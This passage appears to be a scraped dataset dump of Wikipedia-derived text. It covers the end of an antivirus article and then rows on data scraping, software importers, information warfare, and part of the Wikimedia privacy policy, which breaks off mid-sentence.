credit card automatically billed, at the renewal time without explicit approval. For example, McAfee requires users to unsubscribe at least 60 days before the expiration of the present subscription 109 while Bitdefender sends notifications to unsubscribe 30 days before the renewal. 110 Norton AntiVirus also renews subscriptions automatically by default. 111 Some apparent antivirus programs are actually malware masquerading as legitimate software, such as WinFixer, MS Antivirus, and Mac Defender. 112 A "false positive" or "false alarm" is when antivirus software identifies a non-malicious file as malware. When this happens, it can cause serious problems. For example, if an antivirus program is configured to immediately delete or quarantine infected files, as is common on Microsoft Windows antivirus applications, a false positive in an essential file can render the Windows operating system or some applications unusable. 113 Recovering from such damage to critical software infrastructure incurs technical support costs and businesses can be forced to close whilst remedial action is undertaken. 114 115 Examples of serious false-positives: On the basis that Norton Symantec has done this for every one of the last three releases of Pegasus Mail, we can only condemn this product as too flawed to use, and recommend in the strongest terms that our users cease using it in favour of alternative, less buggy anti-virus packages. 117 Running (the real-time protection of) multiple antivirus programs concurrently can degrade performance and create conflicts. 126 However, using a concept called multiscanning, several companies (including G Data Software 127 and Microsoft 128 ) have created applications which can run multiple engines concurrently. It is sometimes necessary to temporarily disable virus protection when installing major updates such as Windows Service Packs or updating graphics card drivers. 129 Active antivirus protection may partially or completely prevent the installation of a major update. Anti-virus software can cause problems during the installation of an operating system upgrade, e.g. when upgrading to a newer version of Windows "in place"—without erasing the previous version of Windows. Microsoft recommends that anti-virus software be disabled to avoid conflicts with the upgrade installation process. 130 131 132 Active anti-virus software can also interfere with a firmware update process. 133 The functionality of a few computer programs can be hampered by active anti-virus software. For example, TrueCrypt, a disk encryption program, states on its troubleshooting page that anti-virus programs can conflict with TrueCrypt and cause it to malfunction or operate very slowly. 134 Anti-virus software can impair the performance and stability of games running in the Steam platform. 135 Support issues also exist around antivirus application interoperability with common solutions like SSL VPN remote access and network access control products. 136 These technology solutions often have policy assessment applications that require an up-to-date antivirus to be installed and running. If the antivirus application is not recognized by the policy assessment, whether because the antivirus application has been updated or because it is not part of the policy assessment library, the user will be unable to connect. Studies in December 2007 showed that the effectiveness of antivirus software had decreased in the previous year, particularly against unknown or zero day attacks. The computer magazine c't found that detection rates for these threats had dropped from 40 to 50% in 2006 to 20 30% in 2007. At that time, the only exception was the NOD32 antivirus, which managed a detection rate of 68%. 137 According to the ZeuS tracker website the average detection rate for all variants of the well-known ZeuS trojan is as low as 40%. 138 The problem is magnified by the changing intent of virus authors. Some years ago it was obvious when a virus infection was present. At the time, viruses were written by amateurs and exhibited destructive behavior or pop-ups. Modern viruses are often written by professionals, financed by criminal organizations. 139 In 2008, Eva Chen, CEO of Trend Micro, stated that the anti-virus industry has over-hyped how effective its products are—and so has been misleading customers—for years. 140 Independent testing on all the major virus scanners consistently shows that none provides 100% virus detection. The best ones provided as high as 99.9% detection for simulated real-world situations, while the lowest provided 91.1% in tests conducted in August 2013. Many virus scanners produce false positive results as well, identifying benign files as malware. 141 Although methods may differ, some notable independent quality testing agencies include AV-Comparatives, ICSA Labs, SE Labs, West Coast Labs, Virus Bulletin, AV-TEST and other members of the Anti-Malware Testing Standards Organization. 142 143 Anti-virus programs are not always effective against new viruses, even those that use non-signature-based methods that should detect new viruses. The reason for this is that the virus designers test their new viruses on the major anti-virus applications to make sure that they are not detected before releasing them into the wild. 144 Some new viruses, particularly ransomware, use polymorphic code to avoid detection by virus scanners. Jerome Segura, a security analyst with ParetoLogic, explained: 145 It's something that they miss a lot of the time because this type of ransomware virus comes from sites that use a polymorphism, which means they basically randomize the file they send you and it gets by well-known antivirus products very easily. I've seen people firsthand getting infected, having all the pop-ups and yet they have antivirus software running and it's not detecting anything. It actually can be pretty hard to get rid of, as well, and you're never really sure if it's really gone. When we see something like that usually we advise to reinstall the operating system or reinstall backups. 145 A proof of concept virus has used the Graphics Processing Unit (GPU) to avoid detection from anti-virus software. The potential success of this involves bypassing the CPU in order to make it much harder for security researchers to analyse the inner workings of such malware. 146 Detecting rootkits is a major challenge for anti-virus programs. Rootkits have full administrative access to the computer and are invisible to users and hidden from the list of running processes in the task manager. Rootkits can modify the inner workings of the operating system and tamper with antivirus programs. 147 If a file has been infected by a computer virus, anti-virus software will attempt to remove the virus code from the file during disinfection, but it is not always able to restore the file to its undamaged state. 148 149 In such circumstances, damaged files can only be restored from existing backups or shadow copies (this is also true for ransomware 150 ); installed software that is damaged requires re-installation 151 (however, see System File Checker). Any writeable firmware in the computer can be infected by malicious code. 152 This is a major concern, as an infected BIOS could require the actual BIOS chip to be replaced to ensure the malicious code is completely removed. 153 Anti-virus software is not effective at protecting firmware and the motherboard BIOS from infection. 154 In 2014, security researchers discovered that USB devices contain writeable firmware which can be modified with malicious code (dubbed "BadUSB"), which anti-virus software cannot detect or prevent. The malicious code can run undetected on the computer and could even infect the operating system prior to it booting up. 155 156 Antivirus software has some drawbacks, first of which that it can impact a computer's performance. 157 Furthermore, inexperienced users can be lulled into a false sense of security when using the computer, considering their computers to be invulnerable, and may have problems understanding the prompts and decisions that antivirus software presents them with. An incorrect decision may lead to a security breach. If the antivirus software employs heuristic detection, it must be fine-tuned to minimize misidentifying harmless software as malicious (false positive). 158 Antivirus software itself usually runs at the highly trusted kernel level of the operating system to allow it access to all the potential malicious process and files, creating a potential avenue of attack. 159 The US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) intelligence agencies, respectively, have been exploiting anti-virus software to spy on users. 160 Anti-virus software has highly privileged and trusted access to the underlying operating system, which makes it a much more appealing target for remote attacks. 161 Additionally anti-virus software is "years behind security-conscious client-side applications like browsers or document readers. It means that Acrobat Reader, Microsoft Word or Google Chrome are harder to exploit than 90 percent of the anti-virus products out there", according to Joxean Koret, a researcher with Coseinc, a Singapore-based information security consultancy. 161 Antivirus software running on individual computers is the most common method employed of guarding against malware, but it is not the only solution. Other solutions can also be employed by users, including Unified Threat Management (UTM), hardware and network firewalls, Cloud-based antivirus and online scanners. Network firewalls prevent unknown programs and processes from accessing the system. However, they are not antivirus systems and make no attempt to identify or remove anything. They may protect against infection from outside the protected computer or network, and limit the activity of any malicious software which is present by blocking incoming or outgoing requests on certain TCP IP ports. A firewall is designed to deal with broader system threats that come from network connections into the system and is not an alternative to a virus protection system. Cloud antivirus is a technology that uses lightweight agent software on the protected computer, while offloading the majority of data analysis to the provider's infrastructure. 162 One approach to implementing cloud antivirus involves scanning suspicious files using multiple antivirus engines. This approach was proposed by an early implementation of the cloud antivirus concept called CloudAV. CloudAV was designed to send programs or documents to a network cloud where multiple antivirus and behavioral detection programs are used simultaneously in order to improve detection rates. Parallel scanning of files using potentially incompatible antivirus scanners is achieved by spawning a virtual machine per detection engine and therefore eliminating any possible issues. CloudAV can also perform "retrospective detection", whereby the cloud detection engine rescans all files in its file access history when a new threat is identified thus improving new threat detection speed. Finally, CloudAV is a solution for effective virus scanning on devices that lack the computing power to perform the scans themselves. 163 Some examples of cloud anti-virus products are Panda Cloud Antivirus and Immunet. Comodo Group has also produced cloud-based anti-virus. 164 165 Some antivirus vendors maintain websites with free online scanning capability of the entire computer, critical areas only, local disks, folders or files. Periodic online scanning is a good idea for those that run antivirus applications on their computers because those applications are frequently slow to catch threats. One of the first things that malicious software does in an attack is disable any existing antivirus software and sometimes the only way to know of an attack is by turning to an online resource that is not installed on the infected computer. 166 Virus removal tools are available to help remove stubborn infections or a certain type of infection. Examples include Windows Malicious Software Removal Tool, 167 Sophos Scan Clean, 168 and Kaspersky Virus Removal Tool. 169 It is also worth noting that sometimes antivirus software can produce a false-positive result, indicating an infection where there is none. 170 A rescue disk that is bootable, such as a CD or USB storage device, can be used to run antivirus software outside of the installed operating system in order to remove infections while they are dormant. A bootable rescue disk can be useful when, for example, the installed operating system is no longer bootable or has malware that is resisting all attempts to be removed by the installed antivirus software. Examples of software that can be used on a bootable rescue disk include the Trend Micro Rescue Disk, 171 Kaspersky Rescue Disk, 172 and Comodo Rescue Disk. 173 Most of the rescue disk software can also be installed onto a USB storage device that is bootable on newer computers. According to an FBI survey, major businesses lose $12 million annually dealing with virus incidents. 174 A survey by Symantec in 2009 found that a third of small to medium-sized business did not use antivirus protection at that time, whereas more than 80% of home users had some kind of antivirus installed. 175 According to a sociological survey conducted by G Data Software in 2010 49% of women did not use any antivirus program at all. 176 |
632 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Technical_variants | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
633 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Importer_(computing) | An importer is a software application that reads in a data file or metadata information in one format and converts it to another format via special algorithms (such as filters). An importer often is not an entire program by itself, but an extension to another program, implemented as a plug-in. When implemented in this way, the importer reads the data from the file and converts it into the hosting application's native format. 1 For example, the data file for a 3D model may be written from a modeler, such as 3D Studio Max. A game developer may then want to use that model in their game's editor. An importer, part of the editor, may read in the 3D Studio Max model and convert it to the game's native format so it can be used in game levels. Importers are important tools in the video game industry. A plug-in or application that does the converse of an importer is called an exporter. |
634 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_warfare | Information warfare (IW) is the battlespace use and management of information and communication technology (ICT) in pursuit of a competitive advantage over an opponent. It is different from cyberwarfare that attacks computers, software, and command control systems. Information warfare is the manipulation of information trusted by a target without the target's awareness so that the target will make decisions against their interest but in the interest of the one conducting information warfare. 1 2 As a result, it is not clear when information warfare begins, ends, and how strong or destructive it is. 3 Information warfare may involve the collection of tactical information, assurance(s) that one's information is valid, spreading of propaganda or disinformation to demoralize or manipulate 4 the enemy and the public, undermining the quality of the opposing force's information, and denial of information-collection opportunities to opposing forces. Information warfare is closely linked to psychological warfare. 5 The United States Armed Forces' use of the term favors technology and hence tends to extend into the realms of electronic warfare, cyberwarfare, information assurance and computer network operations, attack, and defense. Other militaries use the much broader term information operations which, although making use of technology, focuses on the more human-related aspects of information use, including (amongst many others) social network analysis, decision analysis, and the human aspects of command and control. Information warfare has been described as "the use of information to achieve our national objectives. 6 According to NATO, "Information war is an operation conducted in order to gain an information advantage over the opponent. 7 Information warfare can take many forms: The United States Air Force has had Information Warfare Squadrons since the 1980s. In fact, the official mission of the U.S. Air Force is now "To fly, fight and win... in air, space and cyberspace", 9 with the latter referring to its information warfare role. As the U.S. Air Force often risks aircraft and aircrews to attack strategic enemy communications targets, remotely disabling such targets using software and other means can provide a safer alternative. In addition, disabling such networks electronically (instead of explosively) also allows them to be quickly re-enabled after the enemy territory is occupied. Similarly, counter-information warfare units are employed to deny such capability to the enemy. The first application of these techniques was used against Iraqi communications networks in the Gulf War. Also during the Gulf War, Dutch hackers allegedly stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down. 10 In January 1999, U.S. Air Intelligence computers were hit by a coordinated attack (Moonlight Maze), part of which came from a Russian mainframe. This could not be confirmed as a Russian cyber attack due to non-attribution the principle that online identity may not serve as proof of real-world identity. 11 12 13 Within the realm of cyberspace, there are two primary weapons: network-centric warfare and C4ISR, which denotes integrated Command, Control, Communications, Computers, Intelligence, Surveillance and Reconnaissance. Furthermore, cyberspace attacks initiated by one nation against another nation have an underlying goal of gaining information superiority over the attacked party, which includes disrupting or denying the victimized party's ability to gather and distribute information. A real-world occurrence that illustrated the dangerous potential of cyberattacks transpired in 2007, when a strike from Israeli forces demolished an alleged nuclear reactor in Syria that was being constructed via a collaborative effort between Syria and North Korea. Accompanied by the strike was a cyberattack on Syria's air defenses, which left them blind to the attack on the nuclear reactor and, ultimately allowed for the attack to occur (New York Times 2014). An example of a more basic attack on a nation within cyberspace is a distributed denial of service (DDOS) attack, which is utilized to hinder networks or websites until they lose their primary functionality. As implied, cyberattacks do not just affect the military party being attacked, but rather the whole population of the victimized nation. Since more aspects of daily life are being integrated into networks in cyberspace, civilian populations can potentially be negatively affected during wartime. For example, if a nation chose to attack another nation's power grid servers in a specific area to disrupt communications, civilians and businesses in that area would also have to deal with power outages, which could potentially lead to economic disruptions as well. Moreover, physical ICTs have also been implemented into the latest revolution in military affairs by deploying new, more autonomous robots (i.e. unmanned drones) into the battlefield to carry out duties such as patrolling borders and attacking ground targets. Humans from remote locations pilot many of the unmanned drones, however, some of the more advanced robots, such as the Northrop Grumman X 47B, are capable of autonomous decisions. Despite piloting drones from remote locations, a proportion of drone pilots still suffer from stress factors of more traditional warfare. According to NPR, a study performed by the Pentagon in 2011 found that 29% of drone pilots are "burned out" and undergo high levels of stress. Furthermore, approximately 17% of the drone pilots surveyed as the study were labeled "clinically distressed" with some of those pilots also showing signs of post-traumatic stress disorder. 14 Modern ICTs have also brought advancements to communications management among military forces. Communication is a vital aspect of war for any involved party and, through the implementation of new ICTs such as data-enabled devices, military forces are now able to disseminate information faster than ever before. For example, some militaries are now employing the use of iPhones to upload data and information gathered by drones in the same area. 15 16 In 2022, the Armed Forces of Ukraine have taken advantage of deficiencies in Russian communications by allowing them to piggyback on Ukrainian networks, connect, and communicate. Ukrainian forces then eavesdrop, and cut off Russian communications at a crucial part of the conversation. a To build support before it invaded Ukraine, Russia perpetuated a narrative that claimed the Ukrainian government was committing violence against its own Russian speaking population. By publishing large amounts of disinformation on the internet, the alternate narrative was picked up in search results, such as Google News. 25 Russian interference in foreign elections, most notably the Russian interference in the 2016 United States elections, has been described as information warfare. 26 27 Russia has also begun to interfere in the 2024 US presidential elections according to Microsoft. 28 According to NBC, Russia is conducting disinformation campaigns in the 2024 US elections against US president, Joe Biden. 29 Research suggests that Russia and the West are also engaged in an information war. For instance, Russia believes that the West is undermining its leader through the encouragement of overthrowing authoritarian regimes and liberal values. In response, Russia promotes the anti-liberal sentiments, including racism, antisemitism, homophobia, and misogyny. 30 29 Russia has sought to promote the idea that the American democratic state is failing. 29 The Telegraph reported in 2024 that China and Russia were promoting Pro Palestinian influencers in order to manipulate British public opinion in favour of Russian and Chinese interests. 31 NBC reported that Russia was using different tools to cause division within the US, by delegitimizing US police operations against Pro Palestinian protests and by pivoting public conversation from the Russian invasion in Ukraine to the Israeli-Palestinian conflict. 29 Russian media activity increased by 400% in the weeks after Hamas’ Oct. 7 attack on Israel. 29 According to a report by Reuters, the United States ran a propaganda campaign to spread disinformation about the Sinovac Chinese COVID 19 vaccine, including using fake social media accounts to spread the disinformation that the Sinovac vaccine contained pork-derived ingredients and was therefore haram under Islamic law. 32 The campaign was described as "payback" for COVID 19 disinformation by China directed against the U.S. 33 The campaign primarily targeted people in the Philippines and used a social media hashtag for "China is the virus" in Tagalog. 32 The campaign ran from 2020 to mid 2021. 32 The primary contractor for the U.S. military on the project was General Dynamics IT, which received $493 million for its role. 32 While information warfare has yielded many advances in the types of attack that a government can make, it has also raised concerns about the moral and legal ambiguities surrounding this particularly new form of war. Traditionally, wars have been analyzed by moral scholars according to just war theory. However, with Information Warfare, Just War Theory fails because the theory is based on the traditional conception of war. Information Warfare has three main issues surrounding it compared to traditional warfare: Recently, legal concerns have arisen centered on these issues, specifically the issue of the right to privacy in the United States of America. Lt. General Keith B. Alexander, who served as the head of Cyber Command under President Barack Obama, noted that there was a "mismatch between our technical capabilities to conduct operations and the governing laws and policies" when writing to the Senate Armed Services Committee. A key point of concern was the targeting of civilian institutions for cyberattacks, to which the general promised to try to maintain a mindset similar to that of traditional war, in which they will seek to limit the impact on civilians. 35 Group specific: US specific: |
635 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. Because we believe that you should not have to provide personal information to participate in the free knowledge movement, you may: Because we want to understand how Wikimedia Sites are used so we can make them better for you, we collect some information when you: We are committed to: Be aware: The Wikimedia Foundation is the nonprofit organization that operates collaborative, free knowledge websites, like Wikipedia, Wikimedia Commons, and Wiktionary. This Policy explains how we collect, use, and share your Personal Information. By using Wikimedia Sites, you consent to this Policy. The Wikimedia movement is founded on a simple, but powerful principle: we can do more together than any of us can do alone. We cannot work collectively without gathering, sharing, and analyzing information about our users as we seek new ways to make the Wikimedia Sites more usable, safer, and more beneficial. We believe that information-gathering and use should go hand-in-hand with transparency. This Privacy Policy explains how the Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, like Wikipedia, collects, uses, and shares information we receive from you through your use of the Wikimedia Sites. It is essential to understand that, by using any of the Wikimedia Sites, you consent to the collection, transfer, processing, storage, disclosure, and use of your information as described in this Privacy Policy. That means that reading this Policy carefully is important. We believe that you should not have to provide nonpublic Personal Information to participate in the free knowledge movement. You do not have to provide things like your real name, address, or date of birth to sign up for a standard account or contribute content to the Wikimedia Sites. We do not sell or rent your Personal Information, nor do we give it to others to sell you anything. We use it to figure out how to make the Wikimedia Sites more engaging and accessible, to see which ideas work, and to make learning and contributing more fun. Put simply: we use this information to make the Wikimedia Sites better for you. After all, it is people like you, the champions of free knowledge, who make it possible for the Wikimedia Sites to not only exist, but also grow and thrive. We recognize that only a minority of you are familiar with technical terms like "tracking pixels" and "cookies" used in the Privacy Policy. Whether you are brand new to privacy terminology or you are an expert who just wants a refresher, you might find our Glossary of Key Terms helpful. Because everyone (not just lawyers) should be able to easily understand how and why their information is collected and used, we use common language instead of more formal terms throughout this Policy. To help ensure your understanding of some particular key terms, here is a table of translations: Except as explained below, this Privacy Policy applies to our collection and handling of information about you that we receive as a result of your use of any of the Wikimedia Sites. This Policy also applies to information that we receive from our partners or other third parties. To understand more about what this Privacy Policy covers, please see below. For the sake of clarity, this Privacy Policy covers, regardless of language: This Privacy Policy, however, does not cover some situations where we may gather or process information. For example, some uses may be covered by separate privacy policies (like those of the Wikimedia Shop) or sites or services run by third parties (such as third-party developer projects on Wikimedia Cloud Services). To understand more about what this Privacy Policy does not cover, please see below. This section is part of the Privacy Policy and is meant to explain in detail which situations are not covered by our Privacy Policy. Sometimes, volunteers may place a data-collecting tool, such as a script, gadget, tracking pixel, or share button, on a Wikimedia Site without our knowledge. This Policy does not cover how third parties handle the information they receive as a result of such a tool. If you come across such a third-party tool, and you believe it violates this Policy, you can remove the tool yourself, or report it to privacy at wikimedia.org so we can investigate. Where community policies govern information, such as the CheckUser policy, the relevant community may add to the rules and obligations set out in this Policy. However, they are not permitted to create new exceptions or otherwise reduce the protections offered by this Policy. Whatever you post on Wikimedia Sites can be seen and used by everyone. When you make a contribution to any Wikimedia Site, including on user or discussion pages, you are creating a permanent, public record of every piece of content added, removed, or altered by you. The page history will show when your contribution or deletion was made, as well as your username (if you are signed in) or your IP address (if you are not signed in). We may use your public contributions, either aggregated with the public contributions of others or individually, to create new features or data-related products for you or to learn more about how the Wikimedia Sites are used, as further explained below in the "How We Use Information We Receive From You" section of this Privacy Policy. Unless this Policy says otherwise, you should assume that information that you actively contribute to the Wikimedia Sites, including Personal Information, is publicly visible and can be found by search engines. Like most things on the Internet, anything you share may be copied and redistributed throughout the Internet by other people. Please do not contribute any information that you are uncomfortable making permanently public, like revealing your real name or location in your contributions. You should be aware that specific data made public by you or aggregated data that is made public by us can be used by anyone for analysis and to infer further information, such as which country a user is from, political affiliation and gender. You do not need to create an account to use any Wikimedia Site. If you do create an account, you do not need to give us your name or email address (although you can if you choose to, such as for the "Email this user" feature for example). If you do not create an account, your contributions will be publicly attributed to your IP address. Want to create an account? Great Do not want to create an account? No problem You are not required to create an account to read or contribute to a Wikimedia Site, except under rare circumstances. However, if you contribute without signing in, your contribution will be publicly attributed to the IP address associated with your device. If you want to create a standard account, in most cases we require only a username and a password. However, if you choose not to provide an email address, we cannot help you recover your password. Your username will be publicly visible, so please be careful about revealing your real name or other Personal Information in your username. Your password is only used to verify that the account is yours. Your IP address is also automatically submitted to us, and we record it temporarily. This is to protect Wikimedia users and project content; in the event of abuse, IP addresses may be associated with usernames as part of an investigation. No other Personal Information is required: no name, no email address, no date of birth, and no credit card information. Once created, user accounts cannot be removed entirely (although you can usually hide the information on your user page if you choose to). This is because your public contributions must be associated with their author (you ). In some circumstances, the Wikimedia communities can assist users with removing additional information related to their account from the projects. To gain a better understanding of the demographics of our users, to localize our services and to learn how we can improve our services, we may ask you for more demographic information, such as gender or age, about yourself. We will tell you if such information is intended to be public or private, so that you can make an informed decision about whether you want to provide us with that information. Providing such information is always completely optional. If you do not want to, you do not have to—it is as simple as that. Some features we offer work better if we know what area you are in. If you consent, we can use GPS (and other technologies commonly used to determine location) to show you more relevant content. We keep information obtained by these technologies confidential, except as provided in this Policy. You can learn more by checking out the list of examples of how we use these technologies in our FAQ. Sometimes, we automatically receive location data from your device. For example, if you want to upload a photo on the Wikimedia Commons mobile app, we may receive metadata, such as the place and time you took the photo, automatically from your device. Please be aware that, unlike location information collected using GPS signals described above, the default setting on your mobile device typically includes the metadata in your photo or video upload to the Wikimedia Sites. If you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. Finally, when you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We use certain technologies to collect information about how you use Wikimedia Sites. Like other websites, we receive some information about you automatically when you visit the Wikimedia Sites. We also use a variety of commonly-used technologies, like cookies, to collect information regarding how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We want to make the Wikimedia Sites better for you by learning more about how you use them. Examples of this might include how often you visit the Wikimedia Sites, what you like, what you find helpful, how you get to the Wikimedia Sites, and whether you would use a helpful feature more if we explained it differently. We also want this Policy and our practices to reflect our community's values. For this reason, we keep information related to your use of the Wikimedia Sites confidential, except as provided in this Policy. Because of how browsers work, we receive some information automatically when you visit the Wikimedia Sites. This includes when you use an online tool on a third-party site that loads information coming from the Wikimedia Sites. This information includes the type of device you are using (possibly including unique device identification numbers, for some beta versions of our mobile applications), the type and version of your browser, your browser's language preference, the type and version of your device's operating system, in some cases the name of your internet service provider or mobile carrier, the website that referred you to the Wikimedia Sites, which pages you request and visit, and the date and time of each request you make to the Wikimedia Sites. Put simply, we use this information to enhance your experience with Wikimedia Sites. For example, we use this information to administer the sites, provide greater security, and fight vandalism; optimize mobile applications, customize content and set language preferences, test features to see what works, and improve performance; understand how users interact with the Wikimedia Sites, track and study use of various features, gain understanding about the demographics of the different Wikimedia Sites, and analyze trends. We use a variety of commonly-used technologies, like cookies, to understand how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We actively collect some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. These types of technologies may also be used in online tools on a third-party site that loads information from the Wikimedia Sites. We realize that some of these technologies do not have the best reputation in town and can be used for less-than-noble purposes. So we want to be as clear as we can about why we use these methods and the type of information we collect with them. Depending on which technology we use, locally stored data may include text, Personal Information (like your IP address), and information about your use of the Wikimedia Sites (like your username or the time of your visit). See below for more information. We use this information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. We will never use third-party cookies, unless we get your permission to do so. If you ever come across a third-party data collection tool that has not been authorized by you (such as one that may have been mistakenly placed by another user or administrator), please report it to us at privacy wikimedia.org. Locally stored data, JavaScript, and tracking pixels help us do things like: Want to know even more? You can read more about some of the specific cookies we use, when they expire, and what we use them for in our FAQ. We believe this data collection helps improve your user experience, but you may remove or disable some or all locally stored data through your browser settings, depending on your browser. You can learn more about some options you have in our FAQ. While locally stored data may not be necessary to use our sites, some features will not function properly if you disable locally stored data. While the examples above concerning information about you collected through the use of data collection tools are kept confidential in accordance with this Policy, please note that some information about the actions taken by your username is made publicly available through public logs alongside actions taken by other users. For example, a public log may include the date your account was created on a Wikimedia Site along with the dates that other accounts were created on a Wikimedia Site. We and our service providers use your information for the legitimate purpose of pursuing our charitable mission, including: We engage in these activities to manage our relationship with you, because we have a legitimate interest and or to comply with our legal obligations. We will customize the Services, in some instances, with your consent; or in keeping with our legitimate interest. We will send these types of emails to you only with your consent except as otherwise permitted by applicable law. We do not sell, rent, or use your email address to advertise third-party products or services to you. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We will always tell you, at the time we give you an opportunity to share your thoughts, how we plan on using your answers and any Personal Information you provide. Your responses to our surveys and feedback requests are always optional. We will email these types of requests to you only with your consent except as otherwise permitted by applicable law. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We engage in these activities to further our legitimate interest and or to comply with our legal obligations. As stated above, we can use commonly-used location technologies to show you more relevant content. For example, our mobile apps can identify articles from the Wikimedia sites about points of interest near your location. As a reminder, you can consent to and or deactivate our access to these location technologies at any time for example through the native OS functionalities on your mobile device, and still use the Wikimedia Sites. As stated above, we may automatically receive location data from your device. For example, if you upload a photo using the Wikimedia Commons mobile app, please be aware that the default setting on your mobile device typically results in the metadata associated with your photo being included in the upload. As a reminder, if you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. When you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We keep IP addresses confidential, except as provided in this Policy. If you are visiting Wikimedia 